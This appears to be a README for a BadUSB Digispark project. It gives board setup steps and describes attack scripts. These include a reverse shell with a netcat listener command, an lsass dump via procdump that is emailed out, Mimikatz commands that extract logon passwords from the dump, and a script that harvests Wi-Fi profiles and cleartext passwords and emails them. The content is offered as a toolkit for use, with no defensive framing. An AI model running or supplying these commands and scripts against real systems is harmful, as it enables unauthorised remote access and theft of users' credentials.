https://www.arduino.cc/en/Main/Software
https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json
In the Arduino IDE set your board to (DigiSpark Default 16,5 Mhz) and the programmer to USBtinyISP.
https://github.com/digistump/DigistumpArduino/releases
Simple script for setting up a reversed shell over TCP or UDP and specific port.
Run Netcat
# nc -ul -p 53
You can also use powershell scripts see Powershell directory for the files or instructions below.
Started this script for a BadUSB Digispark project, script for retrieving lsass dump with sysinternals procdump tool. Dump file is automatically send to an email address which can be configured in the variables.
Run Mimikatz
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords
Started this script for a BadUSB Digispark project, script for retreiving wlan profile information and clear text passwords. Text file is automatically send to an email address which can be configured in the variables.